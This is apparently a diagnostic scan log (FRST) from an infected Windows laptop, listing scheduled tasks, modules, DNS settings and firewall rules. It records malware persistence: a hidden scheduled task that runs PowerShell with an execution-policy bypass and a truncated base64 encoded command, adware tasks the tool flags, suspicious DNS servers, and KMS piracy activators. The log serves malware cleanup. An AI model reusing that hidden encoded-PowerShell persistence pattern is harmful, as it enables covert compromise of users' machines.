==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {037C1E69-2352-4B71-BF9F-41F90E188F8F} - System32\Tasks\{B427AFCD-2507-455E-962F-0A755643BDDC} => pcalua.exe -a C:\Users\REVERIEN\Downloads\setup_basic_4800_14-5(1).exe -d C:\Users\REVERIEN\Downloads

Task: {06652989-4F08-4C22-9929-45FEAD589085} - System32\Tasks\{8B398634-E508-401C-8F40-1E6B8018FAF9} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.259&LastError=404

Task: {08F320F2-51C3-40FA-901E-6299F4ED245D} - System32\Tasks\Toshiba\CommonNotifier => C:\Program Files (x86)\Toshiba TEMPRO\Toshiba.Tempro.UI.CommonNotifier.exe [2013-01-04] (Toshiba Europe GmbH)

Task: {1B3DA511-80EE-4124-9D8C-4214B6F9F7C7} - System32\Tasks\Trigger KMS Activation => C:\Program Files\KMSnano\TriggerKMS.exe [2013-01-26] ()

Task: {1B690D77-BED4-4BD3-87B3-77B30470B172} - System32\Tasks\{335127B4-0212-47B8-A6F6-BB6DFEC8DC4C} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Programs\pdf-annotator-5.exe -d C:\Users\REVERIEN\Documents\Downloads\Programs

Task: {1C4D72AE-A136-44B9-AB6D-618DC414022A} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION

Task: {43142973-CF66-4C75-9A9C-BD86A7D56A2C} - System32\Tasks\{DE380E56-84B4-4F78-91DA-6FEB3482985D} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.259&LastError=404

Task: {435AE71D-CBDE-4DDF-A504-6D7A8DC77019} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-03-24] (Adobe Systems Incorporated)

Task: {4754F53F-BCD6-4CEB-AE31-E3D1081F2919} - System32\Tasks\RealDownloader Update Check => C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe [2016-02-03] ()

Task: {4899038C-645F-4F99-B06E-C6C53E90E8E8} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)

Task: {4D2B6648-C88F-42D0-801A-2BC13B0D4419} - System32\Tasks\Microsoft\Windows\Setup\8.1 auto install ping => C:\Windows\system32\AutoUpdate.exe

Task: {52FC6D96-0F79-4D7F-9016-C45F51E68844} - System32\Tasks\{B4A54807-95C1-4C56-AD99-3A2CF5B1A653} => pcalua.exe -a C:\Users\REVERIEN\Documents\Downloads\Programs\setup_basic_4800_14-5_2.exe -d C:\Users\REVERIEN\AppData\Roaming\IDM

Task: {57B2A906-6471-42D9-813A-6ECC1BB8FE03} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-15] (Microsoft Corporation)

Task: {620EA6A0-7874-4884-8744-C548E5709A0F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)

Task: {698FBBBE-2414-4D8D-8C84-3409AD2E7EE0} - System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks, Inc.)

Task: {7194F166-8483-4E63-B348-4665129E173B} - System32\Tasks\Microsoft\Windows\Setup\8.1 auto install v2 => C:\WINDOWS\system32\AutoUpdate.exe

Task: {71B218C2-3599-478E-A2FD-5AD8943CB636} - System32\Tasks\{B7687898-7A46-4896-A5EA-EF2E5B2F59D6} => pcalua.exe -a G:\RRutayis\Pavilion\Softwares\setup_basic_4800.exe -d G:\RRutayis\Pavilion\Softwares

Task: {7224D3F7-19A1-42EC-BECA-439673C57A55} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe

Task: {74DE945E-A8A9-46D9-B7C6-43D6200BA2FF} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe [2016-04-02] ()

Task: {7D852E04-7098-426F-97C2-C15FEBB19066} - System32\Tasks\{E0A32E87-8F44-4B73-8A8D-7619716B55C8} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.259&LastError=404

Task: {86BE8531-BCDB-49B1-BB53-F1B51B1F2651} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-22] (Microsoft Corporation)

Task: {86F486B0-1990-4CFA-8DC2-329407DD0A02} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)

Task: {872982BD-00DC-422F-B1CE-6E49E2B5AB8D} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe

Task: {8FE78DF6-0309-4FB0-B487-BF13C767D48D} - System32\Tasks\DNSWALTERS => C:\Program Files (x86)\DNS Unlocker\dnswalters.exe [2016-02-28] () <==== ATTENTION

Task: {9A470131-2390-407D-92E7-6C23D45E2A43} - System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\RealUpgrade.exe [2016-02-03] (RealNetworks, Inc.)

Task: {9FA8A24B-5779-4D13-ABBD-0AEA47FDA1C1} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2015-08-27] (Apple Inc.)

Task: {A6597B70-BC68-4E4E-9418-E07ADAB6CD49} - System32\Tasks\TOSHIBA\Service Station => C:\Program Files\TOSHIBA\Toshiba Service Station\ToshibaServiceStation.exe [2012-07-27] (TOSHIBA Corporation)

Task: {A6A1D5E0-2A0D-4605-8355-ED76B01EE13A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (Google Inc.)

Task: {A7B29358-293E-4C2F-B46F-0E6B97C3127C} - System32\Tasks\MySQLNotifierTask => C:\Program Files (x86)\MySQL\MySQL Notifier 1.1\MySQLNotifier.exe [2014-09-03] (Oracle Corporation)

Task: {B00C6F1F-19F7-4CC1-9F4F-90B9FCC800B9} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)

Task: {B03DB1DA-0393-410C-AA42-6251752AE6FD} - System32\Tasks\MySQL\Installer\ManifestUpdate => C:\Program Files (x86)\MySQL\MySQL Installer for Windows\MySQLInstallerConsole.exe [2015-08-20] (Oracle Corporation)

Task: {BFE355E8-32FA-4BD6-A3F7-D792E36D5785} - System32\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe [2015-08-21] (Dropbox, Inc.)

Task: {C238B4A8-4D88-4DDD-B77A-77590C626E69} - System32\Tasks\{2574E1B5-210F-4149-B661-A7C1B5BE2AEC} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.259&LastError=404

Task: {D96737D8-8E0D-49DB-9B1D-DABEBEB00626} - System32\Tasks\{0E0E7947-0D0D-090 5-0D11-0D087A0D110A} => powershell.exe -nologo -executionpolicy bypass -noninter active -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByA GUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDA G8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzA GMAOwAkAFAAcgBvAGcA (the data entry has 9416 more characters).

Task: {DA4CFD73-5939-4F16-A5D5-2F25F0354A4E} - System32\Tasks\{71C07501-74AE-CA47-A919-ECBA39E73D0C} => C:\WINDOWS\system32\regsvr32.exe [2015-10-30] (Microsoft Corporation)

Task: {DF2B3ACD-B3A9-44E0-A1F7-78CFF05EE2E5} - System32\Tasks\{D2750D47-E820-40A5-94CA-A5BAEEC0E056} => Firefox.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.259&LastError=404

Task: {DF39BBDD-F0B3-4FAD-ABF1-F2A8B63CA7CC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-03-18] (Google Inc.)

Task: {F22B8338-9644-4660-BE5D-D422066ECD42} - System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1240968423-981972810-3087361095-1001 => C:\Program Files (x86)\RealNetworks\RealDownloader\recordingmanager.exe [2016-02-03] (RealNetworks, Inc.)

Task: {F29AEFCF-3872-459A-BE83-E74679F989F2} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [2015-08-19] (Reimage®) <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe

Task: C:\WINDOWS\Tasks\DropboxUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Dropbox\Update\DropboxUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001Core.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-1240968423-981972810-3087361095-1001UA.job => C:\Users\REVERIEN\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe

Task: C:\WINDOWS\Tasks\WebReg .job => C:\Program Files (x86)\HP\Digital Imaging\bin\hpqwrg.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

ShortcutWithArgument: C:\Users\Public\Desktop\Quantum GIS Desktop (1.8.0).lnk -> C:\Program Files (x86)\Quantum GIS Lisboa\bin\nircmd.exe (NirSoft) -> exec hide "C:\Program Files (x86)\Quantum GIS Lisboa\bin\qgis.bat"

==================== Loaded Modules (Whitelisted) ==============

2011-10-13 15:38 - 2011-10-13 15:38 - 00156672 _____ () C:\Program Files (x86)\TOSHIBA\Password Utility\GFNEXSrv.exe

2014-12-24 17:10 - 2014-08-06 03:04 - 01441792 _____ () C:\Program Files\Everything\Everything.exe

2016-03-11 20:25 - 2013-11-15 14:38 - 00066048 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe

2015-09-18 17:53 - 2015-09-18 17:53 - 13067264 _____ () C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe

2016-02-03 18:49 - 2016-02-03 18:49 - 00032544 _____ () C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe

2015-08-19 10:56 - 2015-08-19 10:56 - 06908904 _____ () C:\Program Files\Reimage\Reimage Protector\ReiSystem.exe

2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll

2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\system32\CoreUIComponents.dll

2016-03-02 19:05 - 2016-02-23 13:27 - 02654872 _____ () C:\WINDOWS\System32\CoreUIComponents.dll

2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2016-01-05 11:44 - 2015-12-07 06:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll

2016-03-02 19:05 - 2016-02-23 10:36 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll

2015-10-21 10:47 - 2007-07-18 16:15 - 00020480 _____ () C:\Windows\System32\spool\drivers\x64\3\WrtMon.exe

2016-02-08 22:38 - 2016-02-08 22:38 - 01110048 _____ () C:\Users\REVERIEN\AppData\Local\MalwareProtectionLive\MalwareProtectionClient.exe

2016-03-16 12:25 - 2016-02-28 11:46 - 00678912 _____ () C:\Program Files (x86)\DNS Unlocker\dnswalters.exe

2016-02-02 09:38 - 2016-02-03 11:58 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe

2016-03-29 22:12 - 2016-03-31 10:07 - 00016896 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe

2016-03-29 22:12 - 2016-03-31 10:07 - 17535488 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll

2016-03-04 12:16 - 2016-03-04 12:16 - 00291328 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.325.12390.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll

2015-04-08 13:39 - 2015-04-08 13:39 - 00468480 _____ () C:\Program Files (x86)\Mendeley Desktop\MendeleyWordPlugin.exe

2016-02-03 18:00 - 2016-02-03 18:00 - 00712432 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe

2016-01-13 13:53 - 2016-01-05 03:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll

2016-01-13 13:53 - 2016-01-05 03:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll

2016-02-03 16:21 - 2016-01-16 07:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll

2016-02-03 16:21 - 2016-01-16 07:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll

2016-02-03 18:48 - 2016-02-03 18:48 - 00037688 _____ () C:\Program Files (x86)\Real\UpdateService\DL2UpdatePlugin.dll

2016-02-03 18:48 - 2016-02-03 18:48 - 00039224 _____ () C:\Program Files (x86)\Real\UpdateService\RealDownloaderUpdatePlugin.dll

2016-02-03 18:49 - 2016-02-03 18:49 - 00037192 _____ () C:\Program Files (x86)\Real\UpdateService\VideoDLUpdatePlugin.dll

2013-03-28 07:14 - 2012-06-25 12:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

2016-02-03 18:00 - 2016-02-03 18:00 - 00077552 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\dtvhooks.dll

2016-02-29 20:12 - 2016-02-29 20:12 - 00089328 _____ () c:\program files (x86)\real\realplayer\CrashRpt\CrashRpt1402.dll

2016-02-29 20:09 - 2016-02-29 20:09 - 00022288 _____ () c:\program files (x86)\real\realplayer\RPDS\Tools\ffmpeg\mediautil.dll

2016-02-29 20:09 - 2016-02-29 20:09 - 04274960 _____ () c:\program files (x86)\real\realplayer\RPDS\Tools\ffmpeg\avcodec-55.dll

2016-02-29 20:09 - 2016-02-29 20:09 - 01520912 _____ () c:\program files (x86)\real\realplayer\RPDS\Tools\ffmpeg\avformat-55.dll

2016-02-29 20:09 - 2016-02-29 20:09 - 00322832 _____ () c:\program files (x86)\real\realplayer\RPDS\Tools\ffmpeg\avutil-52.dll

2016-04-06 09:29 - 2016-04-06 09:29 - 00098816 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32api.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00110080 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\pywintypes27.dll

2016-04-06 09:29 - 2016-04-06 09:29 - 00364544 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\pythoncom27.dll

2016-04-06 09:29 - 2016-04-06 09:29 - 00320512 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32com.shell.shell.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00776704 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_hashlib.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 01176576 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._core_.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00806400 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._gdi_.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00816128 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._windows_.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 01067008 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._controls_.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00733184 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._misc_.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00682496 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\pysqlite2._sqlite.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_ctypes.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00119808 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32file.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00108544 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32security.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00007168 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\hashobjs_ext.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00017920 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\thumbnails_ext.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00088064 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\usb_ext.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00167936 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32gui.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00018432 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32event.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00046080 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_socket.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 01208320 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_ssl.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00128512 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_elementtree.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00127488 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\pyexpat.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00013824 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\common.time34.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00038912 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32inet.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00036864 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_psutil_windows.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00525208 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\windows._lib_cacheinvalidation.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00011264 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32crypt.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00077312 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._html2.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00027136 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_multiprocessing.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00020480 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\_yappi.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00035840 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32process.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00686080 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\unicodedata.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00078848 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._animate.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00123392 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\wx._wizard.pyd

2016-04-06 09:29 - 2016-04-06 09:30 - 00024064 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32pipe.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00010240 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\select.pyd

2016-04-06 09:29 - 2016-04-06 09:29 - 00025600 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32pdh.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00017408 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32profile.pyd

2016-04-06 09:30 - 2016-04-06 09:30 - 00022528 _____ () C:\Users\REVERIEN\AppData\Local\Temp\_MEI56922\win32ts.pyd

2016-02-02 09:38 - 2016-02-03 11:58 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll

2016-02-02 09:38 - 2016-02-03 11:58 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll

2015-10-13 15:07 - 2015-10-13 15:07 - 08901184 _____ () C:\Program Files (x86)\Microsoft Office\Office15\1033\GrooveIntlResource.dll

2015-04-08 13:38 - 2015-04-08 13:38 - 00471040 _____ () C:\Program Files (x86)\Mendeley Desktop\Mendeley.dll

2016-02-03 17:53 - 2016-02-03 17:53 - 01382048 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\cpprest100_1_2.dll

2016-02-29 20:09 - 2016-02-29 20:09 - 00654608 _____ () c:\program files (x86)\real\realplayer\RPDS\Lib\r1api.dll

2016-02-03 17:53 - 2016-02-03 17:53 - 06242107 _____ () C:\Program Files (x86)\RealNetworks\RealDownloader\videodl.exe

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\WINDOWS\system32\Drivers\anwlblhj.sys:changelist [4642]

AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [145]

AlternateDataStreams: C:\ProgramData\TEMP:5C1D8A71 [138]

AlternateDataStreams: C:\ProgramData\TEMP:661DFA1C [117]

AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [286]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\partitionguru.com -> hxxp://www.partitionguru.com

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2012-07-26 07:26 - 2016-04-02 20:18 - 00011672 ____A C:\WINDOWS\system32\Drivers\etc\hosts

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\REVERIEN\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img0.jpg

HKU\S-1-5-21-1240968423-981972810-3087361095-501\Control Panel\Desktop\\Wallpaper -> C:\WINDOWS\web\wallpaper\Toshiba\standard.jpg

DNS Servers: 82.163.143.171 - 82.163.142.173

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "Everything"

HKLM\...\StartupApproved\Run: => "HotKeysCmds"

HKLM\...\StartupApproved\Run: => "IgfxTray"

HKLM\...\StartupApproved\Run: => "Persistence"

HKLM\...\StartupApproved\Run: => "RtHDVCpl"

HKLM\...\StartupApproved\Run: => "TecoResident"

HKLM\...\StartupApproved\Run: => "SRS Premium Sound HD"

HKLM\...\StartupApproved\Run: => "TCrdMain"

HKLM\...\StartupApproved\Run: => "TODDMain"

HKLM\...\StartupApproved\Run: => "TosWaitSrv"

HKLM\...\StartupApproved\Run32: => "autodetect"

HKLM\...\StartupApproved\Run32: => "Everything"

HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"

HKLM\...\StartupApproved\Run32: => "RIMBBLaunchAgent.exe"

HKLM\...\StartupApproved\Run32: => "TPUReg"

HKLM\...\StartupApproved\Run32: => "APSDaemon"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "Google Update"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "IDMan"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "Skype"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "Screencast-O-Matic Tray"

HKU\S-1-5-21-1240968423-981972810-3087361095-1001\...\StartupApproved\Run: => "VSee"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139

FirewallRules: [{CED17A21-3FAE-49CF-9ECA-A918423B2CBF}] => (Allow) %systemroot%\system32\alg.exe

FirewallRules: [UDP Query User{A3AD89B2-EF64-4B02-8C8D-76D6EA791ABC}C:\program files (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connectify\connectify.exe

FirewallRules: [TCP Query User{4EEFEEBC-829D-4AC5-A501-D7DD392F3F65}C:\program files (x86)\connectify\connectify.exe] => (Allow) C:\program files (x86)\connectify\connectify.exe

FirewallRules: [{26CBC116-A886-41F6-901D-44B8945880D9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{A1865D0E-DFB8-4358-AC73-2FA0CB843CC6}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

FirewallRules: [{49110ED6-5883-4612-874C-AB647A68DF25}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{ED159E10-39F8-4B76-A3B3-F971B8CAE1AB}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\UcMapi.exe

FirewallRules: [{F924F07A-D2A8-420C-9B88-11AD4B2C8370}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{2C6DE3EC-72A5-4457-8146-3389688D98CC}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office15\lync.exe

FirewallRules: [{07D4D389-98EA-40A9-83BA-D730EC5C9630}] => (Allow) LPort=1688

FirewallRules: [{C109F93D-9100-431D-B61E-83C93D6E996A}] => (Allow) C:\Program Files\KMSpico\AutoPico.exe

les\KMSpico\AutoPico.exe

FirewallRules: [{81227772-2DAA-4A12-AF45-6FD4A355B49D}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe

FirewallRules: [{9BACA3F2-6A32-43D2-9A57-FE02F540F858}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe

FirewallRules: [{EF122BC9-8ED2-4F76-9A83-979E295D2594}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe

FirewallRules: [{BC44951D-BA85-4509-A961-CC23E6570D30}] => (Allow) C:\Program Files\KMSpico\KMSELDI.exe

FirewallRules: [{FB9C1AA6-B1DC-4FAF-823C-D769CA11ED7F}] => (Allow) LPort=1688

